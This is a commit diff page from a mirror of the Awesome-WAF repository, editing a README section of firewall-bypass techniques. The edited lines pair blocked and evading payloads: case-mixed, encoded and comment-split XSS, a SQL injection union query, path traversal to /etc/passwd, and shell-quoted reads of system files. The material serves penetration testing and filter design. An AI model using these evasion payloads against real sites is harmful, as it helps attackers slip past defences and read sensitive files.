Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

Added more WAF fingerprints. Total

Browse Source
This commit is contained in:
0xInfection 2019-03-06 18:45:55 +05:30
parent 78ed134c5e
commit 1961230c2c
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
README.md
View File

@ -1857,7 +1857,7 @@ __Standard__: `<script>alert()</script>`
__Bypassed__: `<ScRipT>alert()</sCRipT>` __Bypassed__: `<ScRipT>alert()</sCRipT>`
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'` __Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
__Bypassed__: `sELecT * FrOM all_tables whERe OWNER = 'DATABASE_NAME'` __Bypassed__: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'`
__2. URL Encoding__ __2. URL Encoding__
- Encode normal payloads with % encoding/URL encoding. - Encode normal payloads with % encoding/URL encoding.
@ -1875,11 +1875,11 @@ __3. Unicode Encoding__
- ASCII characters in unicode encoding encoding provide great variants for bypassing. - ASCII characters in unicode encoding encoding provide great variants for bypassing.
- You can encode entire/part of the payload for obtaining results. - You can encode entire/part of the payload for obtaining results.
__Standard__: `prompt()` __Standard__: `<marquee onstart=prompt()>`
__Obfuscated__: `\u0070r\u06f\u006dpt()` __Obfuscated__: `<marquee onstart=\u0070r\u06f\u006dpt()>`
__Blocked__: `/?redir=http://google.com` __Blocked__: `/?redir=http://google.com`
__Bypassed__: `/?redir=http://google。com` __Bypassed__: `/?redir=http://google。com` (Unicode alternative)
__Standard__: `../../etc/passwd` __Standard__: `../../etc/passwd`
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd` __Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd`
@ -1910,8 +1910,8 @@ __6. Using Comments__
__Blocked__: `<script>alert()</script>` __Blocked__: `<script>alert()</script>`
__Bypassed__: `<!--><script>alert/**/()/**/</script>` __Bypassed__: `<!--><script>alert/**/()/**/</script>`
__Blocked__: `/?id=1+union+select+1,2,3---` __Blocked__: `/?id=1+union+select+1,2,3--`
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3-` __Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`
__7. Double Encoding__ __7. Double Encoding__
- Often WAF filters tend to encode characters to prevent attacks. - Often WAF filters tend to encode characters to prevent attacks.
@ -1920,8 +1920,8 @@ __7. Double Encoding__
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\` __Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\` __Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
__Standard__: `<script>alert('XSS')</script>` __Standard__: `<script>alert()</script>`
__Obfuscated__: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E` __Obfuscated__: `%253Cscript%253Ealert()%253C%252Fscript%253E`
__8. Wildcard Encoding__ __8. Wildcard Encoding__
- Globbing patterns are used by various command-line utilities to work with multiple files. - Globbing patterns are used by various command-line utilities to work with multiple files.
@ -1944,7 +1944,7 @@ __Standard__: `<svg/onload-location=javascript:alert%281%29;//`
__Obfuscated__: ```<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//``` __Obfuscated__: ```<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//```
__Standard__: `/bin/cat /etc/passwd` __Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa'''ss'wd` __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> Bash allows path concatenation for execution. > Bash allows path concatenation for execution.
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>` __Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`